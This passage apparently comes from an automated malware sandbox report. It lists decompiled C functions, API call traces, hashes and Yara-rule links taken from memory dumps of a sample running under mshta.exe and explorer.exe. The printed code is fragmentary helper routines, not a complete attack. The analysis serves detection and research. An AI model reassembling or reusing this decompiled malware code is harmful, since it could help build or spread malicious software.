                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                  • String ID: Soft
                                                                                  • API String ID: 393707159-3753413193
                                                                                  • Opcode ID: c63a063088a42f77ec1c7e311e40c3a1cc9c5350b9f329d89e4804354509254e
                                                                                  • Instruction ID: ea73026ca3c6617d391b961417cad26721aed4a0771b9aac527377b9df7e46d8
                                                                                  • Opcode Fuzzy Hash: c63a063088a42f77ec1c7e311e40c3a1cc9c5350b9f329d89e4804354509254e
                                                                                  • Instruction Fuzzy Hash: 7701A23650031A7FCB12FB65DCC4FAF7A6CDF85255F844421FA0559101DB78C54AC7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F5B10, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 50%
                                                                                  			E033F5B10(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x33fd2dc; // 0x5f29630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x33fd2dc; // 0x5f29630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x33fd030) {
					HeapFree( *0x33fd1f0, 0, _t8);
				}
				_t14[1] = E033F752B(_v0, _t14);
				_t11 =  *0x33fd2dc; // 0x5f29630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                                                  0x033f5b10
                                                                                  0x033f5b10
                                                                                  0x033f5b19
                                                                                  0x033f5b29
                                                                                  0x033f5b29
                                                                                  0x033f5b2e
                                                                                  0x033f5b33
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f5b23
                                                                                  0x033f5b23
                                                                                  0x033f5b35
                                                                                  0x033f5b39
                                                                                  0x033f5b4b
                                                                                  0x033f5b4b
                                                                                  0x033f5b5b
                                                                                  0x033f5b5e
                                                                                  0x033f5b63
                                                                                  0x033f5b67
                                                                                  0x033f5b6d

                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(05F295F0), ref: 033F5B19
                                                                                  • Sleep.KERNEL32(0000000A,?,?,033F79CC,?,?,?,?,?,033F87DD,?,00000001), ref: 033F5B23
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,033F79CC,?,?,?,?,?,033F87DD,?,00000001), ref: 033F5B4B
                                                                                  • RtlLeaveCriticalSection.NTDLL(05F295F0), ref: 033F5B67
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                  • String ID:
                                                                                  • API String ID: 58946197-0
                                                                                  • Opcode ID: 11a21e16b828de234b77d73b2588156db5dad867263af76657f335658953c175
                                                                                  • Instruction ID: 1e20a6804ffa2122c971bd7f70f149d55757d05428d351fb0c1b6c6b78d2b06a
                                                                                  • Opcode Fuzzy Hash: 11a21e16b828de234b77d73b2588156db5dad867263af76657f335658953c175
                                                                                  • Instruction Fuzzy Hash: D8F05874211242AFE714FF68ECC9F1AB7ACEB05340F848400F645C724CC624EC02DB68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F310C, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F310C() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x33fd224; // 0x2d8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x33fd264; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x33fd224; // 0x2d8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x33fd1f0; // 0x5b30000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                  0x033f310c
                                                                                  0x033f3113
                                                                                  0x033f315d
                                                                                  0x033f315f
                                                                                  0x033f315f
                                                                                  0x033f3117
                                                                                  0x033f311d
                                                                                  0x033f3122
                                                                                  0x033f3126
                                                                                  0x033f312c
                                                                                  0x033f3133
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f3135
                                                                                  0x033f313a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f313a
                                                                                  0x033f313c
                                                                                  0x033f3144
                                                                                  0x033f3147
                                                                                  0x033f3147
                                                                                  0x033f314d
                                                                                  0x033f3154
                                                                                  0x033f3157
                                                                                  0x033f3157
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(000002D8,00000001,033FA615), ref: 033F3117
                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 033F3126
                                                                                  • CloseHandle.KERNEL32(000002D8), ref: 033F3147
                                                                                  • HeapDestroy.KERNEL32(05B30000), ref: 033F3157
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                                                  • String ID:
                                                                                  • API String ID: 4109453060-0
                                                                                  • Opcode ID: 109b164b2f9cd67f3875cf59915639dbd5d9f2218e76a5ece554ddd52fb4774a
                                                                                  • Instruction ID: 363fa24a3eb4e159f7387e5113b886a7b95d0acbc664178364fefbe3ff6505ea
                                                                                  • Opcode Fuzzy Hash: 109b164b2f9cd67f3875cf59915639dbd5d9f2218e76a5ece554ddd52fb4774a
                                                                                  • Instruction Fuzzy Hash: 5BF0307574431AAFEB20BB74EDCCF06779CEB15BA1FC80510BA04D728CCB24C40586A0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F10E4, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 37%
                                                                                  			E033F10E4() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x33fd2dc; // 0x5f29630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x33fd2dc; // 0x5f29630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x33fd2dc; // 0x5f29630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x33fe882) {
					HeapFree( *0x33fd1f0, 0, _t10);
					_t7 =  *0x33fd2dc; // 0x5f29630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                  0x033f10e4
                                                                                  0x033f10ed
                                                                                  0x033f10fd
                                                                                  0x033f10fd
                                                                                  0x033f1102
                                                                                  0x033f1107
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f10f7
                                                                                  0x033f10f7
                                                                                  0x033f1109
                                                                                  0x033f110e
                                                                                  0x033f1112
                                                                                  0x033f1125
                                                                                  0x033f112b
                                                                                  0x033f112b
                                                                                  0x033f1134
                                                                                  0x033f1136
                                                                                  0x033f113a
                                                                                  0x033f1140

                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(05F295F0), ref: 033F10ED
                                                                                  • Sleep.KERNEL32(0000000A,?,?,033F79CC,?,?,?,?,?,033F87DD,?,00000001), ref: 033F10F7
                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,033F79CC,?,?,?,?,?,033F87DD,?,00000001), ref: 033F1125
                                                                                  • RtlLeaveCriticalSection.NTDLL(05F295F0), ref: 033F113A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                  • String ID:
                                                                                  • API String ID: 58946197-0
                                                                                  • Opcode ID: b40dcd106d16c7f11c3538ba2f02d330f9bb7f9aa4932777d5d0cb9fe50f2391
                                                                                  • Instruction ID: 06a883a977e8bbc9192d93dbfad5f2326a784edc87c41a6e59f726d5d96e27c9
                                                                                  • Opcode Fuzzy Hash: b40dcd106d16c7f11c3538ba2f02d330f9bb7f9aa4932777d5d0cb9fe50f2391
                                                                                  • Instruction Fuzzy Hash: 6FF0DA74651246EFE718EB29E8C9F19B768EB44741F844014E9028735CCB34E801DB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F46EF, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 58%
                                                                                  			E033F46EF(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E033F75C4(_t2);
				if(_t34 != 0) {
					_t30 = E033F75C4(_t28);
					if(_t30 == 0) {
						E033F4C31(_t34);
					} else {
						_t39 = _a4;
						_t22 = E033FA97B(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E033FA97B(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                  0x033f46ef
                                                                                  0x033f46f9
                                                                                  0x033f46fb
                                                                                  0x033f4701
                                                                                  0x033f4701
                                                                                  0x033f470a
                                                                                  0x033f470e
                                                                                  0x033f471a
                                                                                  0x033f471e
                                                                                  0x033f4792
                                                                                  0x033f4720
                                                                                  0x033f4720
                                                                                  0x033f4724
                                                                                  0x033f472b
                                                                                  0x033f472e
                                                                                  0x033f4748
                                                                                  0x033f4737
                                                                                  0x033f4737
                                                                                  0x033f473b
                                                                                  0x033f473e
                                                                                  0x033f4743
                                                                                  0x033f4743
                                                                                  0x033f474d
                                                                                  0x033f4775
                                                                                  0x033f477b
                                                                                  0x033f477e
                                                                                  0x033f474f
                                                                                  0x033f4751
                                                                                  0x033f4759
                                                                                  0x033f4764
                                                                                  0x033f4769
                                                                                  0x033f4769
                                                                                  0x033f4785
                                                                                  0x033f478c
                                                                                  0x033f478d
                                                                                  0x033f478d
                                                                                  0x033f471e
                                                                                  0x033f479d

                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,033F8390,00000000,00000000,00000000,05F29698,?,?,033F4680,?,05F29698), ref: 033F46FB
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                    • Part of subcall function 033FA97B: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,033F4729,00000000,00000001,00000001,?,?,033F8390,00000000,00000000,00000000,05F29698), ref: 033FA989
                                                                                    • Part of subcall function 033FA97B: StrChrA.SHLWAPI(?,0000003F,?,?,033F8390,00000000,00000000,00000000,05F29698,?,?,033F4680,?,05F29698,0000EA60,?), ref: 033FA993
                                                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,033F8390,00000000,00000000,00000000,05F29698,?,?,033F4680), ref: 033F4759
                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 033F4769
                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 033F4775
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3767559652-0
                                                                                  • Opcode ID: cd792b98d237fdedc56485e406ae87f09513428820f1190f9fea7282c527cc36
                                                                                  • Instruction ID: 3a1038fa8dce47837d0b9d0f18c20cccce1c19209efdb092fbbe7246db9aec48
                                                                                  • Opcode Fuzzy Hash: cd792b98d237fdedc56485e406ae87f09513428820f1190f9fea7282c527cc36
                                                                                  • Instruction Fuzzy Hash: 13218E7A500359AFCB02EF65CCC4EABBFACDF06290F854054FA499B211D634C9058BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F7AC8, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F7AC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E033F75C4(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                  0x033f7add
                                                                                  0x033f7ae1
                                                                                  0x033f7aeb
                                                                                  0x033f7af2
                                                                                  0x033f7af5
                                                                                  0x033f7af7
                                                                                  0x033f7aff
                                                                                  0x033f7b04
                                                                                  0x033f7b12
                                                                                  0x033f7b17
                                                                                  0x033f7b21

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,05F2931C,?,033F4CC5,004F0053,05F2931C,?,?,?,?,?,?,033F3858), ref: 033F7AD8
                                                                                  • lstrlenW.KERNEL32(033F4CC5,?,033F4CC5,004F0053,05F2931C,?,?,?,?,?,?,033F3858), ref: 033F7ADF
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,033F4CC5,004F0053,05F2931C,?,?,?,?,?,?,033F3858), ref: 033F7AFF
                                                                                  • memcpy.NTDLL(73B769A0,033F4CC5,00000002,00000000,004F0053,73B769A0,?,?,033F4CC5,004F0053,05F2931C), ref: 033F7B12
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2411391700-0
                                                                                  • Opcode ID: 99e7187653d89000d86268d043ba39b42046122f97aa6b68801f4a041fd77192
                                                                                  • Instruction ID: 0f36bc2ba591ba516ca1dc5d6a8bf629ce967c83d07daa8c7c98927947664fc6
                                                                                  • Opcode Fuzzy Hash: 99e7187653d89000d86268d043ba39b42046122f97aa6b68801f4a041fd77192
                                                                                  • Instruction Fuzzy Hash: 0CF0F976901118BFCF11EFA9CC84C9F7BACEF092947554062EE08DB201E671EA149BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F74AF, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(05F2887A,00000000,00000000,00000000,033F6CA0,00000000), ref: 033F74BF
                                                                                  • lstrlen.KERNEL32(?), ref: 033F74C7
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • lstrcpy.KERNEL32(00000000,05F2887A), ref: 033F74DB
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 033F74E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 74227042-0
                                                                                  • Opcode ID: 1a2144c5c2ba2633ae05270f84b290008203f076c2ac17fec86c46d4eba84f6b
                                                                                  • Instruction ID: 3659b98962c1a085afbd2f5c328e9c43077dd6df42b4ae6e414cc593250a7b0f
                                                                                  • Opcode Fuzzy Hash: 1a2144c5c2ba2633ae05270f84b290008203f076c2ac17fec86c46d4eba84f6b
                                                                                  • Instruction Fuzzy Hash: 16E012739016656F8711EBE89C88C9FBBACEF897617444816F604D3105C729D809DBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Analysis Process: mshta.exe PID: 492 Parent PID: 3424 mshta.exeCOMMON

                                                                                  Executed Functions

                                                                                  Function 000001F2CE830FB9, Relevance: .0, Instructions: 5COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000003.786784933.000001F2CE830000.00000010.00000001.sdmp, Offset: 000001F2CE830000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                  • Instruction ID: 4ec66dcbab085a6c4445b7cb2bbc5cb3c118a3c841eb8a9975bb54f8e896b7ec
                                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                  • Instruction Fuzzy Hash: 10900228495C0B56D41411910C452AD60406388250FD44590841A90198D49D02961152
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001F2CE830FC1, Relevance: .0, Instructions: 5COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000003.786784933.000001F2CE830000.00000010.00000001.sdmp, Offset: 000001F2CE830000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                  • Instruction ID: 4ec66dcbab085a6c4445b7cb2bbc5cb3c118a3c841eb8a9975bb54f8e896b7ec
                                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                  • Instruction Fuzzy Hash: 10900228495C0B56D41411910C452AD60406388250FD44590841A90198D49D02961152
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 5424 explorer.exeCOMMON

                                                                                  Executed Functions

                                                                                  Function 04DAC458, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 643memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID: @
                                                                                  • API String ID: 1279760036-2766056989
                                                                                  • Opcode ID: 2b0b1a7e621844ba672fbd7c975c592666e47f3efc4b878a1f72b40adda0f817
                                                                                  • Instruction ID: 7b5dd80199127317cc68f0fd89367b08975ff3c1f3999e2d4e84ff74719b539f
                                                                                  • Opcode Fuzzy Hash: 2b0b1a7e621844ba672fbd7c975c592666e47f3efc4b878a1f72b40adda0f817
                                                                                  • Instruction Fuzzy Hash: D8128230728E0A8FDB69EF28D884A7673E1FB98715F54462ED44AC3251EF34E951CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DAF640, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseInformationQueryToken
                                                                                  • String ID: 0
                                                                                  • API String ID: 3130709563-4108050209
                                                                                  • Opcode ID: f5895f5cec159cec64883b650c172f0a268582915eacc63c06442516161aa36d
                                                                                  • Instruction ID: 36a97f8c423162cecedd53e23fbbea0f50cb41c001c226de4929bf6e052592c1
                                                                                  • Opcode Fuzzy Hash: f5895f5cec159cec64883b650c172f0a268582915eacc63c06442516161aa36d
                                                                                  • Instruction Fuzzy Hash: 0E31FC30218B488FD764EF69D8C479AB7E5FBD9311F50492EE48EC3250DB349946CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB7500, Relevance: 7.9, APIs: 5, Instructions: 365fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Find$File$First$BoundaryCloseDeleteDescriptorNext
                                                                                  • String ID:
                                                                                  • API String ID: 497501178-0
                                                                                  • Opcode ID: 9dd355484183675adc5958804eb991c86153142d7fdd9a3a4564d5441d048789
                                                                                  • Instruction ID: c824732f9d922f28d81f020ad6eaa492c32994f19450888be511744ca0612ebf
                                                                                  • Opcode Fuzzy Hash: 9dd355484183675adc5958804eb991c86153142d7fdd9a3a4564d5441d048789
                                                                                  • Instruction Fuzzy Hash: 52C11030708B488FDBA4EF29D898BAA77E1FBD8301F54452DE48AC3255DB34E945CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DBAACC, Relevance: 7.8, APIs: 5, Instructions: 284fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: FileFind$Next$CloseCreateFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1873968597-0
                                                                                  • Opcode ID: ec43f0c3b8a9abdb495af53b823e2bcefce86244cf21586d6a46e467c588e6d7
                                                                                  • Instruction ID: ad5ec91296db5a3b5db986806dcc37fd9ff90e55262f94e392e499ee12f0e9bf
                                                                                  • Opcode Fuzzy Hash: ec43f0c3b8a9abdb495af53b823e2bcefce86244cf21586d6a46e467c588e6d7
                                                                                  • Instruction Fuzzy Hash: 9381D93161CB448FD765EF28D8895E977E1F798301F50892EE48BC3291EE78E94587C2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA74A8, Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 736COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 5e645ce29076bf0e0e77b478d030f46fabcaf474b1e9f355b1405d54c0c4e1a5
                                                                                  • Instruction ID: e507dcddd7e7c06e3ea88a2963708cd2f9a8971b426dba44b4eae924fa1f267a
                                                                                  • Opcode Fuzzy Hash: 5e645ce29076bf0e0e77b478d030f46fabcaf474b1e9f355b1405d54c0c4e1a5
                                                                                  • Instruction Fuzzy Hash: 2E329430718B548FD769EF28D89566AB7E5FB98700F14492DE08BC3261DF38E551CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DAEBD0, Relevance: 6.4, APIs: 4, Instructions: 445registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: QueryValue$CloseOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1586453840-0
                                                                                  • Opcode ID: c2a4bd50ddac5cd25330f0df8796ec603320bde12fb6a07587cc34d06e9df7b3
                                                                                  • Instruction ID: 7066b0693e201795d6957e43574de2200a8bd7413fea120e21d5dd98380e2543
                                                                                  • Opcode Fuzzy Hash: c2a4bd50ddac5cd25330f0df8796ec603320bde12fb6a07587cc34d06e9df7b3
                                                                                  • Instruction Fuzzy Hash: E7D1963125CA488FDB68EF28D884A69B7E1FB95300F25456DE49FC3261DF34E856CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB2854, Relevance: 5.3, APIs: 4, Instructions: 251memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DA7D44: NtQueryInformationProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 04DA7D8E
                                                                                  • VirtualAlloc.KERNEL32 ref: 04DB28A7
                                                                                  • VirtualFree.KERNELBASE ref: 04DB29C8
                                                                                  • VirtualAlloc.KERNEL32 ref: 04DB29E5
                                                                                  • VirtualFree.KERNELBASE ref: 04DB2A79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFree$InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 455085918-0
                                                                                  • Opcode ID: d99f1c45837a0a2278b616fead5eb22d78f03e7e9304eff0ea8f30ecf2eb5f49
                                                                                  • Instruction ID: a96034fcae1deaeeed3856e6f12450502a698c3f9e14d5f2e0f7145a679e2d49
                                                                                  • Opcode Fuzzy Hash: d99f1c45837a0a2278b616fead5eb22d78f03e7e9304eff0ea8f30ecf2eb5f49
